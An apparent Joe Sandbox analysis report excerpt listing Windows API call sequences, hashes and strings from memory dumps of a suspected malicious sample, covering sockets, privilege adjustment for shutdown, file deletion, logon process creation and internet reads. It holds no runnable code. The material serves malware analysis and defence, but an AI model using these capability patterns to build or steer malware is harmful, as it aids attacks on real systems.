                                                          • Opcode Fuzzy Hash: 179952ca6a55abfaaffe5de58555cd963f97a2e21fe0ad73515c28e24eb29c70
                                                          • Instruction Fuzzy Hash: A8417B7190021EAFDF16EF64CC45AFEBBB8FF05310F144466E919A6291EB309A89CF50
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: __itow__swprintf
                                                          • String ID: 3c:$_:
                                                          • API String ID: 674341424-3871541621
                                                          • Opcode ID: b6e698c3bdffcdafbf229f5fe5e13c72d5e274e1264bfdb17d3341e9bc69aa20
                                                          • Instruction ID: 311202cc1bdeece4b3c98beb2e7fa353a4bffc78bc1213ae10c47ecc5d1677aa
                                                          • Opcode Fuzzy Hash: b6e698c3bdffcdafbf229f5fe5e13c72d5e274e1264bfdb17d3341e9bc69aa20
                                                          • Instruction Fuzzy Hash: 33228D716083009FCB26DF14D882BAEB7E8EF89714F14491DF59A9B391DB71E904CB92
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: _memmove
                                                          • String ID:
                                                          • API String ID: 4104443479-0
                                                          • Opcode ID: 35c6be6d85a8e67badef642e92787ed9c8579c348018ecbb36234fb076f90887
                                                          • Instruction ID: b41c925552a035a775839e7a177e03d8cae360b5a549b195a50d497886416532
                                                          • Opcode Fuzzy Hash: 35c6be6d85a8e67badef642e92787ed9c8579c348018ecbb36234fb076f90887
                                                          • Instruction Fuzzy Hash: BB127B70A00619DFDF0ADFA5D981AEEB7B5FF49300F104629E846EB290EB35AD51CB50
                                                          APIs
                                                            • Part of subcall function 00394750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00394743,?,?,003937AE,?), ref: 00394770
                                                            • Part of subcall function 003F4A31: GetFileAttributesW.KERNEL32(?,003F370B), ref: 003F4A32
                                                          • FindFirstFileW.KERNEL32(?,?), ref: 003F3B89
                                                          • DeleteFileW.KERNEL32(?,?,?,?), ref: 003F3BD9
                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 003F3BEA
                                                          • FindClose.KERNEL32(00000000), ref: 003F3C01
                                                          • FindClose.KERNEL32(00000000), ref: 003F3C0A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                          • String ID: \*.*
                                                          • API String ID: 2649000838-1173974218
                                                          • Opcode ID: 584359fa384cb2902a152989eccfe35a3a5d081594bd3d60daaeaf27187cf8e8
                                                          • Instruction ID: d3d528471259980b7bc3eb425fa0011bf0d5d8964b9435dcb5c0c12ce2a0d62e
                                                          • Opcode Fuzzy Hash: 584359fa384cb2902a152989eccfe35a3a5d081594bd3d60daaeaf27187cf8e8
                                                          • Instruction Fuzzy Hash: B93180310193899BC702EF64C8958FFB7A8AE91304F404D2DF4D5961A1EB21DA0DCB67
                                                          APIs
                                                            • Part of subcall function 003E87E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 003E882B
                                                            • Part of subcall function 003E87E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 003E8858
                                                            • Part of subcall function 003E87E1: GetLastError.KERNEL32 ref: 003E8865
                                                          • ExitWindowsEx.USER32(?,00000000), ref: 003F51F9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                          • String ID: $@$SeShutdownPrivilege
                                                          • API String ID: 2234035333-194228
                                                          • Opcode ID: b4f3ae205d8c48f2952ac99a4f2500ea5589fefbdc8f312212d0d33b77c9280e
                                                          • Instruction ID: 0bd37497a9b3cf735d155fbdc507012f02456878a9776efb4c2e504e135d2409
                                                          • Opcode Fuzzy Hash: b4f3ae205d8c48f2952ac99a4f2500ea5589fefbdc8f312212d0d33b77c9280e
                                                          • Instruction Fuzzy Hash: FC012B31B91A1D7BF72A63689C9BFBB725CEB05340F210E35FB07E64D2DA615C018594
                                                          APIs
                                                          • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 004062DC
                                                          • WSAGetLastError.WSOCK32(00000000), ref: 004062EB
                                                          • bind.WSOCK32(00000000,?,00000010), ref: 00406307
                                                          • listen.WSOCK32(00000000,00000005), ref: 00406316
                                                          • WSAGetLastError.WSOCK32(00000000), ref: 00406330
                                                          • closesocket.WSOCK32(00000000,00000000), ref: 00406344
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast$bindclosesocketlistensocket
                                                          • String ID:
                                                          • API String ID: 1279440585-0
                                                          • Opcode ID: 59da40ef5d6089820fd8456b4e5342910e3f85852c99fb2dae196f7f434dca1a
                                                          • Instruction ID: 7bebd74cc4a6afab188427f5348a1a14470a6bc78285745f43274c6806a3baac
                                                          • Opcode Fuzzy Hash: 59da40ef5d6089820fd8456b4e5342910e3f85852c99fb2dae196f7f434dca1a
                                                          • Instruction Fuzzy Hash: 57219E316002149FCB10EF68C846B6EB7E9EF49720F15816EEC26AB3D1C774AD06CB95
                                                          APIs
                                                          • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 003E85E2
                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 003E85E9
                                                          • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 003E85F8
                                                          • CloseHandle.KERNEL32(00000004), ref: 003E8603
                                                          • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 003E8632
                                                          • DestroyEnvironmentBlock.USERENV(00000000), ref: 003E8646
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                          • String ID:
                                                          • API String ID: 1413079979-0
                                                          • Opcode ID: bcd374ed3ee66571557bd0c558856f727d89dc424d21d9d0cbb1f534c7a5e11e
                                                          • Instruction ID: 8e73b0e30421d15ec0fd0eeafcbc272ff058968caee5a0dbcff39578ee19888b
                                                          • Opcode Fuzzy Hash: bcd374ed3ee66571557bd0c558856f727d89dc424d21d9d0cbb1f534c7a5e11e
                                                          • Instruction Fuzzy Hash: DF113A72501149AFDF02CFA4DD48AEE7BA9EB48304F054165FE09A21A0C6729D65EB20
                                                          APIs
                                                            • Part of subcall function 003B0DB6: std::exception::exception.LIBCMT ref: 003B0DEC
                                                            • Part of subcall function 003B0DB6: __CxxThrowException@8.LIBCMT ref: 003B0E01
                                                          • _memmove.LIBCMT ref: 003E0258
                                                          • _memmove.LIBCMT ref: 003E036D
                                                          • _memmove.LIBCMT ref: 003E0414
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                          • String ID:
                                                          • API String ID: 1300846289-0
                                                          • Opcode ID: 57a65c4a3eac3eb9a661a3302125189754dcaa57c7bc855db34b30aebd1d6110
                                                          • Instruction ID: 301f3bd5be6afb043e9f01fb91a7cff1c5106840f7a67cfaf64c35395969f03f
                                                          • Opcode Fuzzy Hash: 57a65c4a3eac3eb9a661a3302125189754dcaa57c7bc855db34b30aebd1d6110
                                                          • Instruction Fuzzy Hash: C502CE70A00219DFCF0ADF65D981AAEBBB5EF45300F158069E80AEF395EB71D950CB91
                                                          APIs
                                                            • Part of subcall function 00392612: GetWindowLongW.USER32(?,000000EB), ref: 00392623
                                                          • DefDlgProcW.USER32(?,?,?,?,?), ref: 003919FA
                                                          • GetSysColor.USER32(0000000F), ref: 00391A4E
                                                          • SetBkColor.GDI32(?,00000000), ref: 00391A61
                                                            • Part of subcall function 00391290: DefDlgProcW.USER32(?,00000020,?), ref: 003912D8
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: ColorProc$LongWindow
                                                          • String ID:
                                                          • API String ID: 3744519093-0
                                                          • Opcode ID: bdcf7bb69ddeab8562429b7907111782a7de9157e2553f39d98e73f47b5c7342
                                                          • Instruction ID: e32c69a9e94502a80cad6e6b04187f5b3ec822a5f624074820a10f8928cb5cc6
                                                          • Opcode Fuzzy Hash: bdcf7bb69ddeab8562429b7907111782a7de9157e2553f39d98e73f47b5c7342
                                                          • Instruction Fuzzy Hash: 09A19971102646BAEF2BAB298C95FBF355DDF42386F12011EF402F6592CB24DD4193BA
                                                          APIs
                                                          • FindFirstFileW.KERNEL32(?,?), ref: 003FBCE6
                                                          • _wcscmp.LIBCMT ref: 003FBD16
                                                          • _wcscmp.LIBCMT ref: 003FBD2B
                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 003FBD3C
                                                          • FindClose.KERNEL32(00000000,00000001,00000000), ref: 003FBD6C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: Find$File_wcscmp$CloseFirstNext
                                                          • String ID:
                                                          • API String ID: 2387731787-0
                                                          • Opcode ID: 380317254b23620d523a46f5963a6e006e3fe8ba222ffb8ee840b4dd966e410b
                                                          • Instruction ID: a1dd1d63f043e1fcac653cf7dc797a265277f6078e7754556b42e12c127bcb85
                                                          • Opcode Fuzzy Hash: 380317254b23620d523a46f5963a6e006e3fe8ba222ffb8ee840b4dd966e410b
                                                          • Instruction Fuzzy Hash: EA51AE756046059FCB15DF28C490EAAF3E8EF49324F10462EFA568B3A1DB30ED04CB92
                                                          APIs
                                                            • Part of subcall function 00407D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00407DB6
                                                          • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0040679E
                                                          • WSAGetLastError.WSOCK32(00000000), ref: 004067C7
                                                          • bind.WSOCK32(00000000,?,00000010), ref: 00406800
                                                          • WSAGetLastError.WSOCK32(00000000), ref: 0040680D
                                                          • closesocket.WSOCK32(00000000,00000000), ref: 00406821
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                          • String ID:
                                                          • API String ID: 99427753-0
                                                          • Opcode ID: 4e6ba07d63e4f9afcb0c1a82ebc83cf9a0b5ff5133c58571697c9c0a8fa806ef
                                                          • Instruction ID: ec20e0d0bbefd5db7dfa0e10187842c0b186eb880f920cba6a59a45ae26599a5
                                                          • Opcode Fuzzy Hash: 4e6ba07d63e4f9afcb0c1a82ebc83cf9a0b5ff5133c58571697c9c0a8fa806ef
                                                          • Instruction Fuzzy Hash: 8141BE75A00210AFDF11BF288886F7E77E89B49714F04846EF91AAF3C2DA749D018792
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                          • String ID:
                                                          • API String ID: 292994002-0
                                                          • Opcode ID: cb7760ae1a3c5f225fc4590e2f71bfd972d8bd6e8e0b01f519c958eb0b9d0431
                                                          • Instruction ID: 53fe419a1b7b9c14aa05ab31e440b4cc15112654f1286a5243c0b0da15179fd1
                                                          • Opcode Fuzzy Hash: cb7760ae1a3c5f225fc4590e2f71bfd972d8bd6e8e0b01f519c958eb0b9d0431
                                                          • Instruction Fuzzy Hash: 3D11C431300915AFDB216F26DC44BEFBB99EF857A1B40803AFC56D7241DB74DC4286A9
                                                          APIs
                                                          • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 003E80C0
                                                          • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 003E80CA
                                                          • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 003E80D9
                                                          • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 003E80E0
                                                          • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 003E80F6
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: HeapInformationToken$AllocErrorLastProcess
                                                          • String ID:
                                                          • API String ID: 44706859-0
                                                          • Opcode ID: d9770b2a5ed096c1990ac5960fc96ee74bfbb9a495f4ed7329b7bd66f00e0225
                                                          • Instruction ID: 7fa7f10fefd87b56bf46e3938403c08c442e8d1a9f730062102569aed25d4cda
                                                          • Opcode Fuzzy Hash: d9770b2a5ed096c1990ac5960fc96ee74bfbb9a495f4ed7329b7bd66f00e0225
                                                          • Instruction Fuzzy Hash: 40F0C270240214BFEB114FA6EC8CFA73FACEF49754B004139F909C21A0CB609D06DA60
                                                          APIs
                                                          • CoInitialize.OLE32(00000000), ref: 003FC432
                                                          • CoCreateInstance.OLE32(00422D6C,00000000,00000001,00422BDC,?), ref: 003FC44A
                                                            • Part of subcall function 00397DE1: _memmove.LIBCMT ref: 00397E22
                                                          • CoUninitialize.OLE32 ref: 003FC6B7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: CreateInitializeInstanceUninitialize_memmove
                                                          • String ID: .lnk
                                                          • API String ID: 2683427295-24824748
                                                          • Opcode ID: 4a3c54970219041ce77b57568e6f8216c161355164a79101904531b437fa1a92
                                                          • Instruction ID: 04b1f64fb9d3957b99bb4a90abfd4823f335c16a671c2fd9375919a70a3b0840
                                                          • Opcode Fuzzy Hash: 4a3c54970219041ce77b57568e6f8216c161355164a79101904531b437fa1a92
                                                          • Instruction Fuzzy Hash: 0EA15B71218205AFD701EF64C881EAFB7E8FF85354F00492DF1958B1A2EB71EA49CB52
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,00394AD0), ref: 00394B45
                                                          • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00394B57
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID: GetNativeSystemInfo$kernel32.dll
                                                          • API String ID: 2574300362-192647395
                                                          • Opcode ID: 1e0b87460f616c6e08be7cee4fe21d16ddbfe59ee30bf0778f73f9019aaa3a19
                                                          • Instruction ID: 54a8d9d8170306f9e06a7d9ef0e9c2cf2b063babf11ea2f8f4d9b94a59e7149f
                                                          • Opcode Fuzzy Hash: 1e0b87460f616c6e08be7cee4fe21d16ddbfe59ee30bf0778f73f9019aaa3a19
                                                          • Instruction Fuzzy Hash: FED01234A14713DFDB209F31E818B8676E4AF05355B21C83A94C9D6554D774E8C5C658
                                                          APIs
                                                          • CreateToolhelp32Snapshot.KERNEL32 ref: 0040EE3D
                                                          • Process32FirstW.KERNEL32(00000000,?), ref: 0040EE4B
                                                            • Part of subcall function 00397DE1: _memmove.LIBCMT ref: 00397E22
                                                          • Process32NextW.KERNEL32(00000000,?), ref: 0040EF0B
                                                          • CloseHandle.KERNEL32(00000000,?,?,?), ref: 0040EF1A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                          • String ID:
                                                          • API String ID: 2576544623-0
                                                          • Opcode ID: 52d62980a0ba4ede187f9dfe98b284e34487241fdbb15b34cf3935ab42ca903e
                                                          • Instruction ID: d5cfcaf00fac9864dbd3d53e5e7f286cf33c3257dcddb16e962102755561b971
                                                          • Opcode Fuzzy Hash: 52d62980a0ba4ede187f9dfe98b284e34487241fdbb15b34cf3935ab42ca903e
                                                          • Instruction Fuzzy Hash: A9519071108311AFD711EF24CC82F6BB7E8EF94700F00482DF8959B2A1EB30A909CB96
                                                          APIs
                                                          • lstrlenW.KERNEL32(?,?,?,00000000), ref: 003EE628
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: lstrlen
                                                          • String ID: ($|
                                                          • API String ID: 1659193697-1631851259
                                                          • Opcode ID: 900ef915de715d93dc05e8dff6cc8e6184ba6a753726e55779a850202369e311
                                                          • Instruction ID: f8c8769c65f7786b23d15a78144da503bc8f7f553fcbbd1017786349e519c610
                                                          • Opcode Fuzzy Hash: 900ef915de715d93dc05e8dff6cc8e6184ba6a753726e55779a850202369e311
                                                          • Instruction Fuzzy Hash: 8C324675A007159FDB29CF19C4809AAB7F0FF48310B16C56EE89ADB7A1E770E941CB44
                                                          APIs
                                                          • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0040180A,00000000), ref: 004023E1
                                                          • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00402418
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: Internet$AvailableDataFileQueryRead
                                                          • String ID:
                                                          • API String ID: 599397726-0
